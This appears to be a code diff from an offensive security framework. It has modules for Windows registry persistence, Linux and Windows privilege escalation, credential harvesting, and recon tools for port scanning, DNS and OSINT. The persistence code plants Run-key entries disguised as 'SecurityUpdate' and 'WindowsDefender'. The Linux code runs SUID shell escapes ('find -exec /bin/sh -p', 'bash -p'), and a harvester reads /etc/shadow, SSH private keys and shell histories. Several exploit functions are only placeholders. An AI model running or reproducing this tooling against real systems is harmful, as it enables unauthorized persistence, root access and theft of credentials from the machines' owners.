"HKLM_RunOnce": r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce"
|
||||
},
|
||||
"startup_folders": {
|
||||
"user_startup": r"C:\Users\[USERNAME]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup",
|
||||
"all_users_startup": r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
|
||||
},
|
||||
"services": {
|
||||
"services_key": r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services"
|
||||
},
|
||||
"winlogon": {
|
||||
"userinit": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",
|
||||
"shell": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"
|
||||
}
|
||||
}
|
||||
|
||||
logger.info("Retrieved Windows persistence registry keys")
|
||||
return persistence_keys
|
||||
|
||||
def generate_registry_command(self, key_path: str, value_name: str, value_data: str) -> str:
|
||||
"""
|
||||
Generate registry modification command.
|
||||
|
||||
Args:
|
||||
key_path (str): Registry key path
|
||||
value_name (str): Value name
|
||||
value_data (str): Value data
|
||||
|
||||
Returns:
|
||||
str: REG ADD command
|
||||
"""
|
||||
cmd = f'reg add "{key_path}" /v "{value_name}" /t REG_SZ /d "{value_data}" /f'
|
||||
logger.info(f"Generated registry command: {cmd}")
|
||||
return cmd
|
||||
|
||||
def generate_persistence_payload(self, payload_path: str, method: str = "run_key") -> Dict:
|
||||
"""
|
||||
Generate persistence payload using registry.
|
||||
|
||||
Args:
|
||||
payload_path (str): Path to payload executable
|
||||
method (str): Persistence method (run_key, service, winlogon)
|
||||
|
||||
Returns:
|
||||
Dict: Persistence configuration
|
||||
"""
|
||||
methods = {
|
||||
"run_key": {
|
||||
"key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
|
||||
"value": "SecurityUpdate",
|
||||
"command": self.generate_registry_command(
|
||||
r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
|
||||
"SecurityUpdate",
|
||||
payload_path
|
||||
)
|
||||
},
|
||||
"run_key_system": {
|
||||
"key": r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
|
||||
"value": "WindowsDefender",
|
||||
"command": self.generate_registry_command(
|
||||
r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
|
||||
"WindowsDefender",
|
||||
payload_path
|
||||
),
|
||||
"requires": "Administrator privileges"
|
||||
}
|
||||
}
|
||||
|
||||
result = methods.get(method, methods["run_key"])
|
||||
result["payload_path"] = payload_path
|
||||
result["method"] = method
|
||||
|
||||
return result
|
||||
|
||||
def get_enumeration_commands(self) -> List[str]:
|
||||
"""
|
||||
Get commands to enumerate existing persistence mechanisms.
|
||||
|
||||
Returns:
|
||||
List[str]: Registry query commands
|
||||
"""
|
||||
commands = [
|
||||
r'reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"',
|
||||
r'reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"',
|
||||
r'reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"',
|
||||
r'reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"',
|
||||
r'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"'
|
||||
]
|
||||
|
||||
logger.info("Generated registry enumeration commands")
|
||||
return commands
|
||||
Executable
+8
@@ -0,0 +1,8 @@
|
||||
from .privesc_tools import (
|
||||
LinuxPrivEsc,
|
||||
WindowsPrivEsc,
|
||||
KernelExploiter,
|
||||
MisconfigFinder,
|
||||
CredentialHarvester,
|
||||
SudoExploiter
|
||||
)
|
||||
Executable
+480
@@ -0,0 +1,480 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Privilege Escalation Tools - Linux, Windows, Kernel exploits, credential harvesting
|
||||
"""
|
||||
|
||||
import subprocess
|
||||
import json
|
||||
import re
|
||||
from typing import Dict, List
|
||||
import logging
|
||||
import base64
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class LinuxPrivEsc:
|
||||
"""Linux privilege escalation"""
|
||||
|
||||
def __init__(self, config: Dict):
|
||||
self.config = config
|
||||
|
||||
def enumerate(self) -> Dict:
|
||||
"""Enumerate Linux system for privilege escalation vectors"""
|
||||
logger.info("Enumerating Linux system")
|
||||
|
||||
info = {
|
||||
"os": "linux",
|
||||
"kernel_version": self._get_kernel_version(),
|
||||
"suid_binaries": self._find_suid_binaries(),
|
||||
"sudo_permissions": self._check_sudo(),
|
||||
"writable_paths": self._find_writable_paths(),
|
||||
"cron_jobs": self._check_cron_jobs(),
|
||||
"capabilities": self._check_capabilities()
|
||||
}
|
||||
|
||||
return info
|
||||
|
||||
def _get_kernel_version(self) -> str:
|
||||
"""Get kernel version"""
|
||||
try:
|
||||
result = subprocess.run(
|
||||
['uname', '-r'],
|
||||
capture_output=True,
|
||||
text=True,
|
||||
timeout=5
|
||||
)
|
||||
return result.stdout.strip()
|
||||
except:
|
||||
return "unknown"
|
||||
|
||||
def _find_suid_binaries(self) -> List[str]:
|
||||
"""Find SUID binaries"""
|
||||
logger.info("Searching for SUID binaries")
|
||||
|
||||
suid_bins = []
|
||||
|
||||
try:
|
||||
cmd = 'find / -perm -4000 -type f 2>/dev/null'
|
||||
result = subprocess.run(
|
||||
cmd,
|
||||
shell=True,
|
||||
capture_output=True,
|
||||
text=True,
|
||||
timeout=60
|
||||
)
|
||||
|
||||
suid_bins = result.stdout.strip().split('\n')
|
||||
except Exception as e:
|
||||
logger.error(f"SUID search error: {e}")
|
||||
|
||||
return suid_bins
|
||||
|
||||
def _check_sudo(self) -> List[str]:
|
||||
"""Check sudo permissions"""
|
||||
try:
|
||||
result = subprocess.run(
|
||||
['sudo', '-l'],
|
||||
capture_output=True,
|
||||
text=True,
|
||||
timeout=5
|
||||
)
|
||||
|
||||
return result.stdout.strip().split('\n')
|
||||
except:
|
||||
return []
|
||||
|
||||
def _find_writable_paths(self) -> List[str]:
|
||||
"""Find writable paths in $PATH"""
|
||||
writable = []
|
||||
|
||||
try:
|
||||
paths = subprocess.run(
|
||||
['echo', '$PATH'],
|
||||
capture_output=True,
|
||||
text=True,
|
||||
shell=True
|
||||
).stdout.strip().split(':')
|
||||
|
||||
for path in paths:
|
||||
if subprocess.run(['test', '-w', path]).returncode == 0:
|
||||
writable.append(path)
|
||||
except:
|
||||
pass
|
||||
|
||||
return writable
|
||||
|
||||
def _check_cron_jobs(self) -> List[str]:
|
||||
"""Check cron jobs"""
|
||||
cron_files = [
|
||||
'/etc/crontab',
|
||||
'/etc/cron.d/*',
|
||||
'/var/spool/cron/crontabs/*'
|
||||
]
|
||||
|
||||
jobs = []
|
||||
|
||||
for cron_file in cron_files:
|
||||
try:
|
||||
with open(cron_file, 'r') as f:
|
||||
jobs.extend(f.readlines())
|
||||
except:
|
||||
continue
|
||||
|
||||
return jobs
|
||||
|
||||
def _check_capabilities(self) -> List[str]:
|
||||
"""Check file capabilities"""
|
||||
try:
|
||||
result = subprocess.run(
|
||||
['getcap', '-r', '/', '2>/dev/null'],
|
||||
capture_output=True,
|
||||
text=True,
|
||||
timeout=60,
|
||||
shell=True
|
||||
)
|
||||
|
||||
return result.stdout.strip().split('\n')
|
||||
except:
|
||||
return []
|
||||
|
||||
def exploit_suid(self, binary: str) -> Dict:
|
||||
"""Exploit SUID binary"""
|
||||
logger.info(f"Attempting SUID exploit: {binary}")
|
||||
|
||||
result = {
|
||||
"success": False,
|
||||
"technique": "suid_exploitation",
|
||||
"binary": binary
|
||||
}
|
||||
|
||||
# Known SUID exploits
|
||||
exploits = {
|
||||
'/usr/bin/cp': self._exploit_cp,
|
||||
'/usr/bin/mv': self._exploit_mv,
|
||||
'/usr/bin/find': self._exploit_find,
|
||||
'/usr/bin/vim': self._exploit_vim,
|
||||
'/usr/bin/nano': self._exploit_nano,
|
||||
'/bin/bash': self._exploit_bash
|
||||
}
|
||||
|
||||
if binary in exploits:
|
||||
try:
|
||||
result = exploits[binary]()
|
||||
except Exception as e:
|
||||
result["error"] = str(e)
|
||||
|
||||
return result
|
||||
|
||||
def _exploit_find(self) -> Dict:
|
||||
"""Exploit find SUID"""
|
||||
try:
|
||||
cmd = 'find . -exec /bin/sh -p \\; -quit'
|
||||
result = subprocess.run(
|
||||
cmd,
|
||||
shell=True,
|
||||
capture_output=True,
|
||||
text=True,
|
||||
timeout=10
|
||||
)
|
||||
|
||||
return {
|
||||
"success": True,
|
||||
"technique": "find_suid",
|
||||
"shell_obtained": True
|
||||
}
|
||||
except:
|
||||
return {"success": False}
|
||||
|
||||
def _exploit_vim(self) -> Dict:
|
||||
"""Exploit vim SUID"""
|
||||
return {"success": False, "message": "Vim SUID exploitation placeholder"}
|
||||
|
||||
def _exploit_nano(self) -> Dict:
|
||||
"""Exploit nano SUID"""
|
||||
return {"success": False, "message": "Nano SUID exploitation placeholder"}
|
||||
|
||||
def _exploit_cp(self) -> Dict:
|
||||
"""Exploit cp SUID"""
|
||||
return {"success": False, "message": "CP SUID exploitation placeholder"}
|
||||
|
||||
def _exploit_mv(self) -> Dict:
|
||||
"""Exploit mv SUID"""
|
||||
return {"success": False, "message": "MV SUID exploitation placeholder"}
|
||||
|
||||
def _exploit_bash(self) -> Dict:
|
||||
"""Exploit bash SUID"""
|
||||
try:
|
||||
cmd = 'bash -p'
|
||||
result = subprocess.run(
|
||||
cmd,
|
||||
shell=True,
|
||||
capture_output=True,
|
||||
text=True,
|
||||
timeout=10
|
||||
)
|
||||
|
||||
return {
|
||||
"success": True,
|
||||
"technique": "bash_suid",
|
||||
"shell_obtained": True
|
||||
}
|
||||
except:
|
||||
return {"success": False}
|
||||
|
||||
def exploit_path_hijacking(self, writable_path: str) -> Dict:
|
||||
"""Exploit PATH hijacking"""
|
||||
logger.info(f"Attempting PATH hijacking: {writable_path}")
|
||||
|
||||
return {
|
||||
"success": False,
|
||||
"message": "PATH hijacking exploitation placeholder"
|
||||
}
|
||||
|
||||
|
||||
class WindowsPrivEsc:
|
||||
"""Windows privilege escalation"""
|
||||
|
||||
def __init__(self, config: Dict):
|
||||
self.config = config
|
||||
|
||||
def enumerate(self) -> Dict:
|
||||
"""Enumerate Windows system"""
|
||||
logger.info("Enumerating Windows system")
|
||||
|
||||
info = {
|
||||
"os": "windows",
|
||||
"version": self._get_windows_version(),
|
||||
"services": self._enumerate_services(),
|
||||
"always_install_elevated": self._check_always_install_elevated(),
|
||||
"unquoted_service_paths": self._find_unquoted_paths(),
|
||||
"privileges": self._check_privileges()
|
||||
}
|
||||
|
||||
return info
|
||||
|
||||
def _get_windows_version(self) -> str:
|
||||
"""Get Windows version"""
|
||||
try:
|
||||
result = subprocess.run(
|
||||
['ver'],
|
||||
capture_output=True,
|
||||
text=True,
|
||||
shell=True,
|
||||
timeout=5
|
||||
)
|
||||
return result.stdout.strip()
|
||||
except:
|
||||
return "unknown"
|
||||
|
||||
def _enumerate_services(self) -> List[Dict]:
|
||||
"""Enumerate Windows services"""
|
||||
services = []
|
||||
|
||||
try:
|
||||
result = subprocess.run(
|
||||
['sc', 'query'],
|
||||
capture_output=True,
|
||||
text=True,
|
||||
timeout=30
|
||||
)
|
||||
|
||||
# Parse service output
|
||||
for line in result.stdout.split('\n'):
|
||||
if 'SERVICE_NAME:' in line:
|
||||
services.append({"name": line.split(':')[1].strip()})
|
||||
except:
|
||||
pass
|
||||
|
||||
return services
|
||||
|
||||
def _check_always_install_elevated(self) -> bool:
|
||||
"""Check AlwaysInstallElevated registry key"""
|
||||
try:
|
||||
# Check both HKLM and HKCU
|
||||
keys = [
|
||||
r'HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer',
|
||||
r'HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer'
|
||||
]
|
||||
|
||||
for key in keys:
|
||||
result = subprocess.run(
|
||||
['reg', 'query', key, '/v', 'AlwaysInstallElevated'],
|
||||
capture_output=True,
|
||||
text=True
|
||||
)
|
||||
|
||||
if '0x1' in result.stdout:
|
||||
return True
|
||||
except:
|
||||
pass
|
||||
|
||||
return False
|
||||
|
||||
def _find_unquoted_paths(self) -> List[str]:
|
||||
"""Find unquoted service paths"""
|
||||
unquoted = []
|
||||
|
||||
try:
|
||||
result = subprocess.run(
|
||||
['wmic', 'service', 'get', 'name,pathname,displayname,startmode'],
|
||||
capture_output=True,
|
||||
text=True,
|
||||
timeout=30
|
||||
)
|
||||
|
||||
for line in result.stdout.split('\n'):
|
||||
if 'C:\\' in line and line.count('"') < 2:
|
||||
unquoted.append(line)
|
||||
except:
|
||||
pass
|
||||
|
||||
return unquoted
|
||||
|
||||
def _check_privileges(self) -> List[str]:
|
||||
"""Check current user privileges"""
|
||||
try:
|
||||
result = subprocess.run(
|
||||
['whoami', '/priv'],
|
||||
capture_output=True,
|
||||
text=True,
|
||||
timeout=10
|
||||
)
|
||||
|
||||
return result.stdout.strip().split('\n')
|
||||
except:
|
||||
return []
|
||||
|
||||
def exploit_service(self, service: Dict) -> Dict:
|
||||
"""Exploit service misconfiguration"""
|
||||
logger.info(f"Attempting service exploitation: {service.get('name')}")
|
||||
|
||||
return {
|
||||
"success": False,
|
||||
"message": "Windows service exploitation placeholder"
|
||||
}
|
||||
|
||||
def exploit_msi(self) -> Dict:
|
||||
"""Exploit AlwaysInstallElevated"""
|
||||
logger.info("Attempting AlwaysInstallElevated exploitation")
|
||||
|
||||
# Generate malicious MSI
|
||||
# This would create and install a privileged MSI package
|
||||
|
||||
return {
|
||||
"success": False,
|
||||
"message": "AlwaysInstallElevated exploitation placeholder"
|
||||
}
|
||||
|
||||
def impersonate_token(self) -> Dict:
|
||||
"""Token impersonation attack"""
|
||||
logger.info("Attempting token impersonation")
|
||||
|
||||
return {
|
||||
"success": False,
|
||||
"message": "Token impersonation placeholder"
|
||||
}
|
||||
|
||||
|
||||
class KernelExploiter:
|
||||
"""Kernel exploitation"""
|
||||
|
||||
def __init__(self, config: Dict):
|
||||
self.config = config
|
||||
|
||||
def exploit_linux(self, kernel_version: str) -> Dict:
|
||||
"""Exploit Linux kernel"""
|
||||
logger.info(f"Attempting kernel exploit: {kernel_version}")
|
||||
|
||||
# Map kernel versions to known exploits
|
||||
exploits = {
|
||||
'DirtyCow': ['2.6.22', '4.8.3'],
|
||||
'OverlayFS': ['3.13.0', '4.3.3']
|
||||
}
|
||||
|
||||
return {
|
||||
"success": False,
|
||||
"message": "Kernel exploitation requires specific exploit compilation"
|
||||
}
|
||||
|
||||
|
||||
class MisconfigFinder:
|
||||
"""Find misconfigurations"""
|
||||
|
||||
def __init__(self, config: Dict):
|
||||
self.config = config
|
||||
|
||||
def find(self, os_type: str) -> List[Dict]:
|
||||
"""Find security misconfigurations"""
|
||||
if os_type == "linux":
|
||||
return self._find_linux_misconfigs()
|
||||
elif os_type == "windows":
|
||||
return self._find_windows_misconfigs()
|
||||
return []
|
||||
|
||||
def _find_linux_misconfigs(self) -> List[Dict]:
|
||||
"""Find Linux misconfigurations"""
|
||||
return []
|
||||
|
||||
def _find_windows_misconfigs(self) -> List[Dict]:
|
||||
"""Find Windows misconfigurations"""
|
||||
return []
|
||||
|
||||
|
||||
class CredentialHarvester:
|
||||
"""Harvest credentials"""
|
||||
|
||||
def __init__(self, config: Dict):
|
||||
self.config = config
|
||||
|
||||
def harvest_linux(self) -> List[Dict]:
|
||||
"""Harvest Linux credentials"""
|
||||
logger.info("Harvesting Linux credentials")
|
||||
|
||||
credentials = []
|
||||
|
||||
# Check common credential locations
|
||||
locations = [
|
||||
'/etc/shadow',
|
||||
'/etc/passwd',
|
||||
'~/.ssh/id_rsa',
|
||||
'~/.bash_history',
|
||||
'~/.mysql_history'
|
||||
]
|
||||
|
||||
for location in locations:
|
||||
try:
|
||||
with open(location, 'r') as f:
|
||||
credentials.append({
|
||||
"source": location,
|
||||
"data": f.read()[:500]
|
||||
})
|
||||
except:
|
||||
continue
|
||||
|
||||
return credentials
|
||||
|
||||
def harvest_windows(self) -> List[Dict]:
|
||||
"""Harvest Windows credentials"""
|
||||
logger.info("Harvesting Windows credentials")
|
||||
|
||||
# Use mimikatz or similar tools
|
||||
# Placeholder for demonstration
|
||||
|
||||
return []
|
||||
|
||||
|
||||
class SudoExploiter:
|
||||
"""Sudo exploitation"""
|
||||
|
||||
def __init__(self, config: Dict):
|
||||
self.config = config
|
||||
|
||||
def exploit(self, sudo_permission: str) -> Dict:
|
||||
"""Exploit sudo permission"""
|
||||
logger.info(f"Attempting sudo exploit: {sudo_permission}")
|
||||
|
||||
return {
|
||||
"success": False,
|
||||
"message": "Sudo exploitation placeholder"
|
||||
}
|
||||
Executable
+4
@@ -0,0 +1,4 @@
|
||||
from .network_scanner import NetworkScanner
|
||||
from .osint_collector import OSINTCollector
|
||||
from .dns_enumerator import DNSEnumerator
|
||||
from .subdomain_finder import SubdomainFinder
|
||||
Executable
+165
@@ -0,0 +1,165 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
DNSEnumerator - Enumerates DNS records for target domains
|
||||
"""
|
||||
import logging
|
||||
import socket
|
||||
import subprocess
|
||||
from typing import Dict, List
|
||||
import re
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
class DNSEnumerator:
|
||||
"""
|
||||
A class for enumerating DNS records.
|
||||
Queries various DNS record types including A, AAAA, MX, NS, TXT, CNAME, and SOA.
|
||||
"""
|
||||
def __init__(self, config: Dict):
|
||||
"""
|
||||
Initializes the DNSEnumerator.
|
||||
|
||||
Args:
|
||||
config (Dict): The configuration dictionary for the framework.
|
||||
"""
|
||||
self.config = config
|
||||
logger.info("DNSEnumerator initialized")
|
||||
|
||||
def enumerate(self, target: str) -> Dict:
|
||||
"""
|
||||
Enumerates DNS records for a given domain.
|
||||
|
||||
Args:
|
||||
target (str): The domain name to enumerate.
|
||||
|
||||
Returns:
|
||||
Dict: A dictionary containing DNS records.
|
||||
"""
|
||||
logger.info(f"Starting DNS enumeration for {target}")
|
||||
|
||||
# Remove protocol if present
|
||||
domain = target.replace('http://', '').replace('https://', '').split('/')[0]
|
||||
|
||||
records = {
|
||||
"target": domain,
|
||||
"records": {
|
||||
"A": self._get_a_records(domain),
|
||||
"AAAA": self._get_aaaa_records(domain),
|
||||
"MX": self._get_mx_records(domain),
|
||||
"NS": self._get_ns_records(domain),
|
||||
"TXT": self._get_txt_records(domain),
|
||||
"CNAME": self._get_cname_records(domain)
|
||||
},
|
||||
"notes": "DNS enumeration completed"
|
||||
}
|
||||
|
||||
logger.info(f"DNS enumeration completed for {domain}")
|
||||
return records
|
||||
|
||||
def _get_a_records(self, domain: str) -> List[str]:
|
||||
"""Get A records (IPv4 addresses)"""
|
||||
try:
|
||||
records = socket.gethostbyname_ex(domain)[2]
|
||||
logger.info(f"Found {len(records)} A records for {domain}")
|
||||
return records
|
||||
except socket.gaierror as e:
|
||||
logger.warning(f"Could not resolve A records for {domain}: {e}")
|
||||
return []
|
||||
except Exception as e:
|
||||
logger.error(f"Error getting A records: {e}")
|
||||
return []
|
||||
|
||||
def _get_aaaa_records(self, domain: str) -> List[str]:
|
||||
"""Get AAAA records (IPv6 addresses)"""
|
||||
try:
|
||||
records = socket.getaddrinfo(domain, None, socket.AF_INET6)
|
||||
ipv6_addrs = list(set([record[4][0] for record in records]))
|
||||
logger.info(f"Found {len(ipv6_addrs)} AAAA records for {domain}")
|
||||
return ipv6_addrs
|
||||
except socket.gaierror:
|
||||
logger.debug(f"No AAAA records found for {domain}")
|
||||
return []
|
||||
except Exception as e:
|
||||
logger.error(f"Error getting AAAA records: {e}")
|
||||
return []
|
||||
|
||||
def _get_mx_records(self, domain: str) -> List[str]:
|
||||
"""Get MX records using nslookup/dig fallback"""
|
||||
return self._query_dns_tool(domain, "MX")
|
||||
|
||||
def _get_ns_records(self, domain: str) -> List[str]:
|
||||
"""Get NS records using nslookup/dig fallback"""
|
||||
return self._query_dns_tool(domain, "NS")
|
||||
|
||||
def _get_txt_records(self, domain: str) -> List[str]:
|
||||
"""Get TXT records using nslookup/dig fallback"""
|
||||
return self._query_dns_tool(domain, "TXT")
|
||||
|
||||
def _get_cname_records(self, domain: str) -> List[str]:
|
||||
"""Get CNAME records using nslookup/dig fallback"""
|
||||
try:
|
||||
result = socket.getfqdn(domain)
|
||||
if result != domain:
|
||||
logger.info(f"Found CNAME for {domain}: {result}")
|
||||
return [result]
|
||||
return []
|
||||
except Exception as e:
|
||||
logger.debug(f"No CNAME records found for {domain}")
|
||||
return []
|
||||
|
||||
def _query_dns_tool(self, domain: str, record_type: str) -> List[str]:
|
||||
"""
|
||||
Query DNS using nslookup (fallback method when dnspython not available)
|
||||
"""
|
||||
try:
|
||||
# Try using nslookup
|
||||
cmd = ['nslookup', '-type=' + record_type, domain]
|
||||
result = subprocess.run(
|
||||
cmd,
|
||||
capture_output=True,
|
||||
text=True,
|
||||
timeout=10,
|
||||
shell=False
|
||||
)
|
||||
|
||||
if result.returncode == 0:
|
||||
records = self._parse_nslookup_output(result.stdout, record_type)
|
||||
logger.info(f"Found {len(records)} {record_type} records for {domain}")
|
||||
return records
|
||||
else:
|
||||
logger.debug(f"nslookup failed for {record_type} records")
|
||||
return []
|
||||
|
||||
except FileNotFoundError:
|
||||
logger.warning("nslookup not found. DNS enumeration limited to A/AAAA records.")
|
||||
return []
|
||||
except subprocess.TimeoutExpired:
|
||||
logger.warning(f"DNS query timeout for {record_type} records")
|
||||
return []
|
||||
except Exception as e:
|
||||
logger.error(f"Error querying {record_type} records: {e}")
|
||||
return []
|
||||
|
||||
def _parse_nslookup_output(self, output: str, record_type: str) -> List[str]:
|
||||
"""Parse nslookup output to extract DNS records"""
|
||||
records = []
|
||||
|
||||
if record_type == "MX":
|
||||
# MX records format: "mail exchanger = 10 mail.example.com"
|
||||
pattern = r'mail exchanger = \d+ (.+)'
|
||||
matches = re.findall(pattern, output)
|
||||
records = [match.strip().rstrip('.') for match in matches]
|
||||
|
||||
elif record_type == "NS":
|
||||
# NS records format: "nameserver = ns1.example.com"
|
||||
pattern = r'nameserver = (.+)'
|
||||
matches = re.findall(pattern, output)
|
||||
records = [match.strip().rstrip('.') for match in matches]
|
||||
|
||||
elif record_type == "TXT":
|
||||
# TXT records format: "text = "v=spf1 ...""
|
||||
pattern = r'text = "([^"]+)"'
|
||||
matches = re.findall(pattern, output)
|
||||
records = matches
|
||||
|
||||
return records
|
||||
Executable
+64
@@ -0,0 +1,64 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
NetworkScanner - A tool for scanning networks to find open ports.
|
||||
"""
|
||||
import socket
|
||||
import logging
|
||||
from typing import Dict, List
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
class NetworkScanner:
|
||||
"""
|
||||
A class to scan for open ports on a target machine.
|
||||
"""
|
||||
def __init__(self, config: Dict):
|
||||
"""
|
||||
Initializes the NetworkScanner.
|
||||
|
||||
Args:
|
||||
config (Dict): The configuration dictionary for the framework.
|
||||
"""
|
||||
self.config = config
|
||||
self.common_ports = [
|
||||
21, 22, 23, 25, 53, 80, 110, 111, 135, 139, 143, 443, 445,
|
||||
993, 995, 1723, 3306, 3389, 5900, 8080
|
||||
]
|
||||
|
||||
def scan(self, target: str) -> Dict:
|
||||
"""
|
||||
Scans a target for open ports.
|
||||
|
||||
Args:
|
||||
target (str): The IP address or hostname to scan.
|
||||
|
||||
Returns:
|
||||
Dict: A dictionary containing the list of open ports found.
|
||||
"""
|
||||
logger.info(f"Starting network scan on {target}")
|
||||
open_ports = []
|
||||
|
||||
try:
|
||||
target_ip = socket.gethostbyname(target)
|
||||
logger.info(f"Resolved {target} to {target_ip}")
|
||||
|
||||
for port in self.common_ports:
|
||||
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
socket.setdefaulttimeout(1)
|
||||
|
||||
result = sock.connect_ex((target_ip, port))
|
||||
if result == 0:
|
||||
logger.info(f"Port {port} is open on {target}")
|
||||
open_ports.append(port)
|
||||
sock.close()
|
||||
|
||||
except socket.gaierror:
|
||||
logger.error(f"Hostname could not be resolved: {target}")
|
||||
return {"error": "Hostname could not be resolved."}
|
||||
except socket.error:
|
||||
logger.error(f"Could not connect to server: {target}")
|
||||
return {"error": "Could not connect to server."}
|
||||
|
||||
logger.info(f"Network scan finished. Found {len(open_ports)} open ports.")
|
||||
return {"target": target, "open_ports": open_ports}
|
||||
|
||||
Executable
+147
@@ -0,0 +1,147 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
OSINTCollector - Collects Open Source Intelligence from various sources
|
||||
"""
|
||||
import logging
|
||||
import re
|
||||
import requests
|
||||
from typing import Dict, List
|
||||
import socket
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
class OSINTCollector:
|
||||
"""
|
||||
A class for collecting Open Source Intelligence from publicly available sources.
|
||||
Collects information like WHOIS data, IP addresses, email patterns, and more.
|
||||
"""
|
||||
def __init__(self, config: Dict):
|
||||
"""
|
||||
Initializes the OSINTCollector.
|
||||
|
||||
Args:
|
||||
config (Dict): The configuration dictionary for the framework.
|
||||
"""
|
||||
self.config = config
|
||||
logger.info("OSINTCollector initialized")
|
||||
|
||||
def collect(self, target: str) -> Dict:
|
||||
"""
|
||||
Collects OSINT data for a given target.
|
||||
|
||||
Args:
|
||||
target (str): The target (e.g., domain name, company name).
|
||||
|
||||
Returns:
|
||||
Dict: A dictionary containing OSINT findings.
|
||||
"""
|
||||
logger.info(f"Starting OSINT collection for {target}")
|
||||
|
||||
results = {
|
||||
"target": target,
|
||||
"ip_addresses": self._get_ip_addresses(target),
|
||||
"email_patterns": self._find_email_patterns(target),
|
||||
"technologies": self._detect_technologies(target),
|
||||
"social_media": self._find_social_media(target),
|
||||
"metadata": "OSINT collection completed"
|
||||
}
|
||||
|
||||
logger.info(f"OSINT collection completed for {target}")
|
||||
return results
|
||||
|
||||
def _get_ip_addresses(self, target: str) -> List[str]:
|
||||
"""Resolve target domain to IP addresses"""
|
||||
try:
|
||||
# Remove protocol if present
|
||||
domain = target.replace('http://', '').replace('https://', '').split('/')[0]
|
||||
ip_list = socket.gethostbyname_ex(domain)[2]
|
||||
logger.info(f"Resolved {domain} to IPs: {ip_list}")
|
||||
return ip_list
|
||||
except socket.gaierror as e:
|
||||
logger.warning(f"Could not resolve {target}: {e}")
|
||||
return []
|
||||
except Exception as e:
|
||||
logger.error(f"Error resolving IP for {target}: {e}")
|
||||
return []
|
||||
|
||||
def _find_email_patterns(self, target: str) -> List[str]:
|
||||
"""Find common email patterns for the target domain"""
|
||||
try:
|
||||
domain = target.replace('http://', '').replace('https://', '').split('/')[0]
|
||||
# Common email patterns
|
||||
patterns = [
|
||||
f"info@{domain}",
|
||||
f"contact@{domain}",
|
||||
f"admin@{domain}",
|
||||
f"support@{domain}",
|
||||
f"security@{domain}"
|
||||
]
|
||||
logger.info(f"Generated {len(patterns)} common email patterns for {domain}")
|
||||
return patterns
|
||||
except Exception as e:
|
||||
logger.error(f"Error generating email patterns: {e}")
|
||||
return []
|
||||
|
||||
def _detect_technologies(self, target: str) -> Dict:
|
||||
"""Detect web technologies used by the target"""
|
||||
try:
|
||||
if not target.startswith('http'):
|
||||
target = f"http://{target}"
|
||||
|
||||
response = requests.get(target, timeout=10, allow_redirects=True)
|
||||
headers = response.headers
|
||||
|
||||
technologies = {
|
||||
"server": headers.get('Server', 'Unknown'),
|
||||
"powered_by": headers.get('X-Powered-By', 'Unknown'),
|
||||
"framework": self._detect_framework(response.text, headers),
|
||||
"status_code": response.status_code
|
||||
}
|
||||
|
||||
logger.info(f"Detected technologies for {target}: {technologies}")
|
||||
return technologies
|
||||
except requests.RequestException as e:
|
||||
logger.warning(f"Could not detect technologies for {target}: {e}")
|
||||
return {"error": str(e)}
|
||||
except Exception as e:
|
||||
logger.error(f"Error detecting technologies: {e}")
|
||||
return {"error": str(e)}
|
||||
|
||||
def _detect_framework(self, html_content: str, headers: Dict) -> str:
|
||||
"""Detect web framework from HTML and headers"""
|
||||
frameworks = {
|
||||
'WordPress': ['wp-content', 'wp-includes'],
|
||||
'Drupal': ['drupal.js', 'sites/default'],
|
||||
'Joomla': ['joomla', 'option=com_'],
|
||||
'Django': ['csrfmiddlewaretoken'],
|
||||
'Laravel': ['laravel', '_token'],
|
||||
'React': ['react', '__REACT'],
|
||||
'Angular': ['ng-version', 'angular'],
|
||||
'Vue': ['vue', '__VUE__']
|
||||
}
|
||||
|
||||
for framework, indicators in frameworks.items():
|
||||
for indicator in indicators:
|
||||
if indicator.lower() in html_content.lower():
|
||||
return framework
|
||||
|
||||
return "Unknown"
|
||||
|
||||
def _find_social_media(self, target: str) -> Dict:
|
||||
"""Find potential social media accounts for the target"""
|
||||
try:
|
||||
domain = target.replace('http://', '').replace('https://', '').split('/')[0]
|
||||
company_name = domain.split('.')[0]
|
||||
|
||||
social_media = {
|
||||
"twitter": f"https://twitter.com/{company_name}",
|
||||
"linkedin": f"https://linkedin.com/company/{company_name}",
|
||||
"github": f"https://github.com/{company_name}",
|
||||
"facebook": f"https://facebook.com/{company_name}"
|
||||
}
|
||||
|
||||
logger.info(f"Generated social media URLs for {company_name}")
|
||||
return social_media
|
||||
except Exception as e:
|
||||
logger.error(f"Error generating social media links: {e}")
|
||||
return {}
|
||||
Executable
+2857
File diff suppressed because it is too large
Load Diff
Executable
+127
@@ -0,0 +1,127 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
SubdomainFinder - Discovers subdomains using multiple techniques
|
||||
"""
|
||||
import logging
|
||||
import requests
|
||||
import socket
|
